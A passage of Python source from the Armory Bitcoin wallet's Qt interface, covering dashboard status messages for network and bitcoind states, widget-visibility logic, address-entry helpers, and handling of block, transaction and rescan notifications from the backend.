receive Bitcoin payments regardless of whether you are online,
but you will have to verify that payment through another service
until Armory is finished this initialization.""")
if state == 'InitializingDoneSoon':
msg = tr( \
'The software is downloading and processing the latest activity '
'on the network related to your wallet. This should take only '
'a few minutes. While you wait, you can manage your wallets. '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallet if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting you password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever! See the <a href="https://bitcoinarmory.com/">'
'Armory Backups page</a> for more info.',
'The software is downloading and processing the latest activity '
'on the network related to your wallets. This should take only '
'a few minutes. While you wait, you can manage your wallets. '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallets if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting you password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever! See the <a href="https://bitcoinarmory.com/">'
'Armory Backups page</a> for more info.',
len(self.walletMap)
)
return msg
if state == 'OnlineDisconnected':
return tr( \
'Armory\'s communication with the Bitcoin network was interrupted. '
'This usually does not happen unless you closed the process that '
'Armory was using to communicate with the network. Armory requires '
'%(sdm)s to be running in the background, and this error pops up if it '
'disappears.'
'<br><br>You may continue in offline mode, or you can close '
'all Bitcoin processes and restart Armory.') \
% { 'sdm' : os.path.basename(TheSDM.executable) }
if state == 'OfflineBadConnection':
return tr( \
'Armory has experienced an issue trying to communicate with the '
'Bitcoin software. The software is running in the background, '
'but Armory cannot communicate with it through RPC as it expects '
'to be able to. If you changed any settings in the Bitcoin home '
'directory, please make sure that RPC is enabled and that it is '
'accepting connections from localhost. '
'<br><br>'
'If you have not changed anything, please export the log file '
'(from the "File" menu) and send it to support@bitcoinarmory.com')
if state == 'OfflineSatoshiAvail':
return tr( \
'Armory does not detect internet access, but it does detect '
'running Bitcoin software. Armory is in offline-mode. <br><br>'
'If you are intending to run an offline system, you will not '
'need to have the Bitcoin software installed on the offline '
'computer. It is only needed for the online computer. '
'If you expected to be online and '
'the absence of internet is an error, please restart Armory '
'using the "--skip-online-check" option. ')
if state == 'OfflineForcedButSatoshiAvail':
return tr( \
'Armory was started in offline-mode, but detected you are '
'running Bitcoin software. If you are intending to run an '
'offline system, you will <u>not</u> need to have the Bitcoin '
'software installed or running on the offline '
'computer. It is only required for being online. ')
if state == 'OfflineBadDBEnv':
return tr( \
'The Bitcoin software indicates there '
'is a problem with its databases. This can occur when '
'Bitcoin-Qt/bitcoind is upgraded or downgraded, or sometimes '
'just by chance after an unclean shutdown.'
'<br><br>'
'You can either revert your installed Bitcoin software to the '
'last known working version (but not earlier than version 0.8.1) '
'or delete everything <b>except</b> "wallet.dat" from the your Bitcoin '
'home directory:<br><br>'
'<font face="courier"><b>%(satoshipath)s</b></font>'
'<br><br>'
'If you choose to delete the contents of the Bitcoin home '
'directory, you will have to do a fresh download of the blockchain '
'again, which will require a few hours the first '
'time.') % { 'satoshipath' : self.satoshiHomePath }
if state == 'OfflineBtcdCrashed':
sout = '' if TheSDM.btcOut==None else str(TheSDM.btcOut)
serr = '' if TheSDM.btcErr==None else str(TheSDM.btcErr)
soutHtml = '<br><br>' + '<br>'.join(sout.strip().split('\n'))
serrHtml = '<br><br>' + '<br>'.join(serr.strip().split('\n'))
soutDisp = '<b><font face="courier">StdOut: %s</font></b>' % soutHtml
serrDisp = '<b><font face="courier">StdErr: %s</font></b>' % serrHtml
if len(sout)>0 or len(serr)>0:
return (tr("""
There was an error starting the underlying Bitcoin engine.
This should not normally happen. Usually it occurs when you
have been using Bitcoin-Qt prior to using Armory, especially
if you have upgraded or downgraded Bitcoin-Qt recently.
Output from bitcoind:<br>""") + \
(soutDisp if len(sout)>0 else '') + \
(serrDisp if len(serr)>0 else '') )
else:
return ( tr("""
There was an error starting the underlying Bitcoin engine.
This should not normally happen. Usually it occurs when you
have been using Bitcoin-Qt prior to using Armory, especially
if you have upgraded or downgraded Bitcoin-Qt recently.
<br><br>
Unfortunately, this error is so strange, Armory does not
recognize it. Please go to "Export Log File" from the "File"
menu and email at as an attachment to <a href="mailto:
support@bitcoinarmory.com?Subject=Bitcoind%20Crash">
support@bitcoinarmory.com</a>. We apologize for the
inconvenience!"""))
# TODO - move out of polling and call on events
#############################################################################
def setDashboardDetails(self, INIT=False):
"""
We've dumped all the dashboard text into the above 2 methods in order
to declutter this method.
"""
if self.isShuttingDown:
return
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
tdmState = TheTDM.getTDMState()
descr = ''
descr1 = ''
descr2 = ''
# Methods for showing/hiding groups of widgets on the dashboard
def setBtnRowVisible(r, visBool):
for c in range(3):
self.dashBtns[r][c].setVisible(visBool)
def setSyncRowVisible(b):
self.lblDashModeSync.setVisible(b)
self.barProgressSync.setVisible(b)
self.lblTimeLeftSync.setVisible(b)
def setTorrentRowVisible(b):
self.lblDashModeTorrent.setVisible(b)
self.barProgressTorrent.setVisible(b)
self.lblTimeLeftTorrent.setVisible(b)
self.lblTorrentStats.setVisible(b)
def setBuildRowVisible(b):
self.lblDashModeBuild.setVisible(b)
self.barProgressBuild.setVisible(b)
self.lblTimeLeftBuild.setVisible(b)
def setScanRowVisible(b):
self.lblDashModeScan.setVisible(b)
self.barProgressScan.setVisible(b)
self.lblTimeLeftScan.setVisible(b)
def setOnlyDashModeVisible():
setTorrentRowVisible(False)
setSyncRowVisible(False)
setBuildRowVisible(False)
setScanRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setVisible(True)
def setBtnFrameVisible(b, descr=''):
self.frmDashMidButtons.setVisible(b)
self.lblDashBtnDescr.setVisible(len(descr)>0)
self.lblDashBtnDescr.setText(descr)
if INIT:
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, False)
setBtnRowVisible(DASHBTNS.Close, False)
setOnlyDashModeVisible()
# This keeps popping up for some reason!
self.lblTorrentStats.setVisible(False)
if self.doAutoBitcoind and not sdmState=='BitcoindReady':
# User is letting Armory manage the Satoshi client for them.
# TODO - Move to event handlers
if not sdmState==self.lastSDMState:
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
# There's a whole bunch of stuff that has to be hidden/shown
# depending on the state... set some reasonable defaults here
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Close, False)
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if satoshiIsAvailable():
self.frmDashMidButtons.setVisible(True)
setBtnRowVisible(DASHBTNS.Close, True)
if CLI_OPTIONS.offline:
# Forced offline but bitcoind is running
LOGINFO('Dashboard switched to auto-OfflineForcedButSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineForcedButSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineNoSatoshiNoInternet')
setBtnFrameVisible(True, \
tr('In case you actually do have internet access, you can use '
'the following links to get Armory installed. Or change '
'your settings.'))
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
descr1 += self.GetDashStateText('Auto','OfflineNoSatoshiNoInternet')
descr2 += self.GetDashFunctionalityText(tr('Offline'))
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif not TheSDM.isRunningBitcoind() and not TheTDM.isRunning():
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
# Bitcoind is not being managed, but we want it to be
if satoshiIsAvailable() or sdmState=='BitcoindAlreadyRunning':
# But bitcoind/-qt is already running
LOGINFO('Dashboard switched to auto-butSatoshiRunning')
self.lblDashModeSync.setText(tr(' Please close Bitcoin-Qt'), \
size=4, bold=True)
setBtnFrameVisible(True, '')
setBtnRowVisible(DASHBTNS.Close, True)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(tr('Check Again'))
#setBtnRowVisible(DASHBTNS.Close, True)
descr1 += self.GetDashStateText('Auto', 'OfflineBitcoindRunning')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
#self.psutil_detect_bitcoin_exe_path()
elif sdmState in ['BitcoindExeMissing', 'BitcoindHomeMissing']:
LOGINFO('Dashboard switched to auto-cannotFindExeHome')
if sdmState=='BitcoindExeMissing':
self.lblDashModeSync.setText(tr('Cannot find Bitcoin Installation'), \
size=4, bold=True)
else:
self.lblDashModeSync.setText(tr('Cannot find Bitcoin Home Directory'), \
size=4, bold=True)
setBtnRowVisible(DASHBTNS.Close, satoshiIsAvailable())
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(tr('Check Again'))
setBtnFrameVisible(True)
descr1 += self.GetDashStateText('Auto', 'OfflineNeedBitcoinInst')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmState in ['BitcoindDatabaseEnvError']:
LOGINFO('Dashboard switched to auto-BadDBEnv')
setOnlyDashModeVisible()
setBtnRowVisible(DASHBTNS.Install, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
setBtnRowVisible(DASHBTNS.Settings, True)
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
descr1 += self.GetDashStateText('Auto', 'OfflineBadDBEnv')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
setBtnFrameVisible(True, '')
elif sdmState in ['BitcoindUnknownCrash']:
LOGERROR('Should not usually get here')
setOnlyDashModeVisible()
setBtnFrameVisible(True, \
tr('Try reinstalling the Bitcoin '
'software then restart Armory. If you continue to have '
'problems, please contact Armory\'s core developer at '
'<a href="mailto:support@bitcoinarmory.com?Subject=Bitcoind%20Crash"'
'>support@bitcoinarmory.com</a>.'))
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Install, True)
LOGINFO('Dashboard switched to auto-BtcdCrashed')
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
descr1 += self.GetDashStateText('Auto', 'OfflineBtcdCrashed')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
self.lblDashDescr1.setTextInteractionFlags( \
Qt.TextSelectableByMouse | \
Qt.TextSelectableByKeyboard)
elif sdmState in ['BitcoindNotAvailable']:
LOGERROR('BitcoindNotAvailable: should not happen...')
self.notAvailErrorCount += 1
descr1 += ''
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
setBtnFrameVisible(False)
descr1 += ''
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else: # online detected/forced, and TheSDM has already been started
if sdmState in ['BitcoindWrongPassword', 'BitcoindNotAvailable']:
extraTxt = ''
if not self.wasSynchronizing:
setOnlyDashModeVisible()
else:
extraTxt = tr("""
<b>Armory has lost connection to the
core Bitcoin software. If you did not do anything
that affects your network connection or the bitcoind
process, it will probably recover on its own in a
couple minutes</b><br><br>""")
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
LOGINFO('Dashboard switched to auto-BadConnection')
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
descr1 += self.GetDashStateText('Auto', 'OfflineBadConnection')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(extraTxt + descr1)
self.lblDashDescr2.setText(descr2)
elif sdmState in ['BitcoindInitializing', \
'BitcoindSynchronizing', \
'TorrentSynchronizing']:
self.wasSynchronizing = True
LOGINFO('Dashboard switched to auto-InitSync')
self.lblBusy.setVisible(True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.updateSyncProgress()
# If torrent ever ran, leave it visible
setSyncRowVisible(True)
setScanRowVisible(True)
setTorrentRowVisible(TheTDM.isStarted())
if TheTDM.isRunning():
self.lblDashModeTorrent.setText(tr('Downloading via Armory CDN'), \
size=4, bold=True, color='Foreground')
self.lblDashModeSync.setText( tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
self.lblTorrentStats.setVisible(True)
elif sdmState=='BitcoindInitializing':
self.lblDashModeTorrent.setText(tr('Download via Armory CDN'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeSync.setText( tr('Initializing Bitcoin Engine'), \
size=4, bold=True, color='Foreground')
self.lblTorrentStats.setVisible(False)
else:
self.lblDashModeTorrent.setText(tr('Download via Armory CDN'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeSync.setText( 'Synchronizing with Network', \
size=4, bold=True, color='Foreground')
self.lblTorrentStats.setVisible(False)
self.lblDashModeBuild.setText( tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
# If more than 10 days behind, or still downloading torrent
if tdmState=='Downloading' or self.approxBlkLeft > 1440:
descr1 += self.GetDashStateText('Auto', 'InitializingLongTime')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
else:
descr1 += self.GetDashStateText('Auto', 'InitializingDoneSoon')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
tr('Since version 0.88, Armory runs bitcoind in the '
'background. You can switch back to '
'the old way in the Settings dialog. '))
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
# User is managing satoshi client, or bitcoind is already sync'd
self.frmDashMidButtons.setVisible(False)
if bdmState in (BDM_OFFLINE, BDM_UNINITIALIZED):
if self.internetStatus == INTERNET_STATUS.Unavailable:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.btnModeSwitch.setEnabled(False)
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if not satoshiIsAvailable():
descr = self.GetDashStateText('User','OfflineNoSatoshiNoInternet')
else:
descr = self.GetDashStateText('User', 'OfflineNoInternet')
descr += '<br><br>'
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
LOGINFO('Dashboard switched to user-OfflineOnlinePoss')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblBusy.setVisible(False)
self.lblDashModeSync.setText(tr('Armory is <u>offline</u>'), size=4, bold=True)
descr = self.GetDashStateText('User', 'OfflineButOnlinePossible')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
if not satoshiIsAvailable():
descr = self.GetDashStateText('User','OfflineNoSatoshi')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
tr('If you would like Armory to manage the Bitcoin software '
'for you (Bitcoin-Qt or bitcoind), then adjust your '
'Armory settings, then restart Armory.'))
descr = self.GetDashStateText('User','OfflineNoSatoshiNoInternet')
else:
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setEnabled(True)
self.btnModeSwitch.setText(tr('Go Online!'))
descr = self.GetDashStateText('User', 'OfflineNoInternet')
descr += '<br><br>'
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
elif bdmState == BDM_BLOCKCHAIN_READY:
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
self.lblBusy.setVisible(False)
if self.netMode == NETWORKMODE.Disconnected:
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( tr('Armory is disconnected'), size=4, color='TextWarn', bold=True)
descr = self.GetDashStateText('User','Disconnected')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
# Fully online mode
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( tr('Armory is online!'), color='TextGreen', size=4, bold=True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
descr = self.GetDashStateText('User', 'OnlineFull1')
descr += self.GetDashFunctionalityText('Online')
descr += self.GetDashStateText('User', 'OnlineFull2')
self.lblDashDescr1.setText(descr)
#self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
elif bdmState == BDM_SCANNING:
LOGINFO('Dashboard switched to "Scanning" mode')
self.updateSyncProgress()
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
self.lblBusy.setVisible(True)
self.btnModeSwitch.setVisible(False)
if TheSDM.getSDMState() == 'BitcoindReady':
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.lblDashModeSync.setVisible(True)
self.lblTimeLeftSync.setText('')
self.lblDashModeSync.setText( tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
else:
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(False)
if len(str(self.lblDashModeBuild.text()).strip()) == 0:
self.lblDashModeBuild.setText( tr('Preparing Databases'), \
size=4, bold=True, color='Foreground')
if len(str(self.lblDashModeScan.text()).strip()) == 0:
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
if len(self.walletMap)==0:
descr = self.GetDashStateText('User','ScanNoWallets')
else:
descr = self.GetDashStateText('User','ScanWithWallets')
descr += self.GetDashStateText('Auto', 'NewUserInfo')
descr += self.GetDashFunctionalityText('Scanning') + '<br>'
self.lblDashDescr1.setText(descr)
self.lblDashDescr2.setText('')
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
else:
LOGERROR('What the heck blockchain mode are we in? %s', bdmState)
self.lastSDMState = sdmState
self.lblDashModeTorrent.setContentsMargins( 50,5,50,5)
self.lblDashModeSync.setContentsMargins( 50,5,50,5)
self.lblDashModeBuild.setContentsMargins(50,5,50,5)
self.lblDashModeScan.setContentsMargins( 50,5,50,5)
vbar = self.dashScrollArea.verticalScrollBar()
# On Macs, this causes the main window scroll area to keep bouncing back
# to the top. Not setting the value seems to fix it. DR - 2014/02/12
if not OS_MACOSX:
vbar.setValue(vbar.minimum())
#############################################################################
def createToolTipWidget(self, tiptext, iconSz=2):
"""
The <u></u> is to signal to Qt that it should be interpretted as HTML/Rich
text even if no HTML tags are used. This appears to be necessary for Qt
to wrap the tooltip text
"""
fgColor = htmlColor('ToolTipQ')
lbl = QLabel('<font size=%d color=%s>(?)</font>' % (iconSz, fgColor))
lbl.setMaximumWidth(relaxedSizeStr(lbl, '(?)')[0])
def setAllText(wself, txt):
def pressEv(ev):
QWhatsThis.showText(ev.globalPos(), txt, self)
wself.mousePressEvent = pressEv
wself.setToolTip('<u></u>' + txt)
# Calling setText on this widget will update both the tooltip and QWT
from types import MethodType
lbl.setText = MethodType(setAllText, lbl)
lbl.setText(tiptext)
return lbl
#############################################################################
def createAddressEntryWidgets(self, parent, initString='', maxDetectLen=128,
boldDetectParts=0, **cabbKWArgs):
"""
If you are putting the LBL_DETECT somewhere that is space-constrained,
set maxDetectLen to a smaller value. It will limit the number of chars
to be included in the autodetect label.
"cabbKWArgs" is "create address book button kwargs"
Here's the signature of that function... you can pass any named args
to this function and they will be passed along to createAddrBookButton
def createAddrBookButton(parent, targWidget, defaultWltID=None,
actionStr="Select", selectExistingOnly=False,
selectMineOnly=False, getPubKey=False,
showLockboxes=True)
Returns three widgets that can be put into layouts:
[[QLineEdit: addr/pubkey]] [[Button: Addrbook]]
[[Label: Wallet/Lockbox/Addr autodetect]]
"""
addrEntryObjs = {}
addrEntryObjs['QLE_ADDR'] = QLineEdit()
addrEntryObjs['QLE_ADDR'].setText(initString)
addrEntryObjs['BTN_BOOK'] = createAddrBookButton(parent,
addrEntryObjs['QLE_ADDR'],
**cabbKWArgs)
addrEntryObjs['LBL_DETECT'] = QRichLabel('')
addrEntryObjs['CALLBACK_GETSCRIPT'] = None
##########################################################################
# Create a function that reads the user string and updates labels if
# the entry is recognized. This will be used to automatically show the
# user that what they entered is recognized and gives them more info
#
# It's a little awkward to put this whole thing in here... this could
# probably use some refactoring
def updateAddrDetectLabels():
try:
enteredText = str(addrEntryObjs['QLE_ADDR'].text()).strip()
scriptInfo = self.getScriptForUserString(enteredText)
displayInfo = self.getDisplayStringForScript(
scriptInfo['Script'], maxDetectLen, boldDetectParts,
prefIDOverAddr=scriptInfo['ShowID'])
dispStr = displayInfo['String']
if displayInfo['WltID'] is None and displayInfo['LboxID'] is None:
addrEntryObjs['LBL_DETECT'].setText(dispStr)
else:
addrEntryObjs['LBL_DETECT'].setText(dispStr, color='TextBlue')
# No point in repeating what the user just entered
addrEntryObjs['LBL_DETECT'].setVisible(enteredText != dispStr)
addrEntryObjs['QLE_ADDR'].setCursorPosition(0)
except:
#LOGEXCEPT('Invalid recipient string')
addrEntryObjs['LBL_DETECT'].setVisible(False)
addrEntryObjs['LBL_DETECT'].setVisible(False)
# End function to be connected
##########################################################################
# Now actually connect the entry widgets
parent.connect(addrEntryObjs['QLE_ADDR'], SIGNAL('textChanged(QString)'),
updateAddrDetectLabels)
updateAddrDetectLabels()
# Create a func that can be called to get the script that was entered
# This uses getScriptForUserString() which actually returns 4 vals
# rawScript, wltIDorNone, lboxIDorNone, addrStringEntered
# (The last one is really only used to determine what info is most
# relevant to display to the user...it can be ignored in most cases)
def getScript():
entered = str(addrEntryObjs['QLE_ADDR'].text()).strip()
return self.getScriptForUserString(entered)
addrEntryObjs['CALLBACK_GETSCRIPT'] = getScript
return addrEntryObjs
#############################################################################
def getScriptForUserString(self, userStr):
return getScriptForUserString(userStr, self.walletMap, self.allLockboxes)
#############################################################################
def getDisplayStringForScript(self, binScript, maxChars=256,
doBold=0, prefIDOverAddr=False,
lblTrunc=12, lastTrunc=12):
return getDisplayStringForScript(binScript, self.walletMap,
self.allLockboxes, maxChars, doBold,
prefIDOverAddr, lblTrunc, lastTrunc)
#############################################################################
def checkNewZeroConf(self, ledgers):
'''
Function that looks at an incoming zero-confirmation transaction queue and
determines if any incoming transactions were created by Armory. If so, the
transaction will be passed along to a user notification queue.
'''
for le in ledgers:
notifyIn = self.getSettingOrSetDefault('NotifyBtcIn', \
not OS_MACOSX)
notifyOut = self.getSettingOrSetDefault('NotifyBtcOut', \
not OS_MACOSX)
if (le.getValue() <= 0 and notifyOut) or \
(le.getValue() > 0 and notifyIn):
# notifiedAlready = False,
self.notifyQueue.append([le.getWalletID(), le, False])
self.createCombinedLedger()
self.walletModel.reset()
self.lockboxLedgModel.reset()
#############################################################################
def handleCppNotification(self, action, args):
if action == FINISH_LOAD_BLOCKCHAIN_ACTION:
#Blockchain just finished loading, finish initializing UI and render the
#ledgers
self.blkReceived = RightNow()
if self.needUpdateAfterScan:
LOGDEBUG('Running finishLoadBlockchain')
self.finishLoadBlockchainGUI()
self.needUpdateAfterScan = False
self.setDashboardDetails()
elif action == NEW_ZC_ACTION:
#A zero conf Tx conerns one of the address Armory is tracking, pull the
#updated ledgers from the BDM and create the related notifications.
self.checkNewZeroConf(args)
elif action == NEW_BLOCK_ACTION:
#A new block has appeared, pull updated ledgers from the BDM, display
#the new block height in the status bar and note the block received time
newBlocks = args[0]
if newBlocks>0:
print 'New Block: ', TheBDM.getTopBlockHeight()
self.ledgerModel.reset()
LOGINFO('New Block! : %d', TheBDM.getTopBlockHeight())
self.createCombinedLedger()
self.blkReceived = RightNow()
self.writeSetting('LastBlkRecvTime', self.blkReceived)
self.writeSetting('LastBlkRecv', TheBDM.getTopBlockHeight())
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
self.lblArmoryStatus.setText(\
tr('<font color=%(color)s>Connected (%(hgt)s blocks)</font> ') % \
{ 'color' : htmlColor('TextGreen'), 'hgt' : TheBDM.getTopBlockHeight()})
# Update the wallet view to immediately reflect new balances
self.walletModel.reset()
elif action == REFRESH_ACTION:
#The wallet ledgers have been updated from an event outside of new ZC
#or new blocks (usually a wallet or address was imported, or the
#wallet filter was modified
reset = False
if len(args) == 0:
self.createCombinedLedger()
return
for wltID in args:
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.isEnabled = True
self.walletModel.reset()
wlt.doAfterScan()
self.changeWltFilter()
elif wltID in self.lockboxIDMap:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = True
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.changeLBFilter()
elif wltID == "wallet_filter_changed":
reset = True
if self.walletSideScanProgress.has_key(wltID):
del self.walletSideScanProgress[wltID]
self.createCombinedLedger(reset)
elif action == 'progress':
#Received progress data for a wallet side scan
wltIDList = args[0]
prog = args[1]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = prog*100
if wltID in self.walletMap:
hasWallet = True
else:
hasLockbox = True
if hasWallet:
self.walletModel.reset()
if hasLockbox:
self.lockboxLedgModel.reset()
if self.lbDialogModel != None:
self.lbDialogModel.reset()
elif action == WARNING_ACTION:
#something went wrong on the C++ side, create a message box to report
#it to the user
if 'rescan' in args[0].lower() or 'rebuild' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, 'BDM error!', args[0],
"Rebuild and rescan on next start", dnaaStartChk=False)
if result[1] == True:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
elif 'factory reset' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, 'BDM error!', args[0],
"Factory reset on next start", dnaaStartChk=False)
if result[1] == True:
DlgFactoryReset(self, self).exec_()
else:
QMessageBox.critical(self, tr('BlockDataManager Warning'), \
tr(args[0]), \
QMessageBox.Ok)
#this is a critical error reporting channel, should kill the app right
#after
os._exit(0)
elif action == SCAN_ACTION:
wltIDList = args[0]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = 0
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.disableWalletUI()
if wltID in self.walletDialogDict:
self.walletDialogDict[wltID].reject()
del self.walletDialogDict[wltID]
hasWallet = True
else:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = False
hasLockbox = True
if hasWallet:
self.changeWltFilter()
if hasLockbox:
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.resetLBSelection()
self.lbDialog.changeLBFilter()
#############################################################################
def Heartbeat(self, nextBeatSec=1):
"""
This method is invoked when the app is initialized, and will
run every second, or whatever is specified in the nextBeatSec
argument.
"""
# Special heartbeat functions are for special windows that may need
# to update every, say, every 0.1s
# is all that matters at that moment, like a download progress window.
# This is "special" because you are putting all other processing on
# hold while this special window is active
# IMPORTANT: Make sure that the special heartbeat function returns
# a value below zero when it's done OR if it errors out!
# Otherwise, it should return the next heartbeat delay,
# which would probably be something like 0.1 for a rapidly
# updating progress counter
for fn in self.extraHeartbeatSpecial:
try:
nextBeat = fn()
if nextBeat>0:
reactor.callLater(nextBeat, self.Heartbeat)
else:
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
except:
LOGEXCEPT('Error in special heartbeat function')
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
return
# TorrentDownloadManager
# SatoshiDaemonManager
# BlockDataManager
tdmState = TheTDM.getTDMState()
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
self.heartbeatCount += 1
if self.heartbeatCount % 60 == 20:
self.processAnnounceData()
self.processAlerts()
try:
for func in self.extraHeartbeatAlways:
if isinstance(func, list):
fnc = func[0]
kargs = func[1]
keep_running = func[2]
if keep_running == False:
self.extraHeartbeatAlways.remove(func)
fnc(*kargs)
else:
func()
for idx,wltID in enumerate(self.walletIDList):
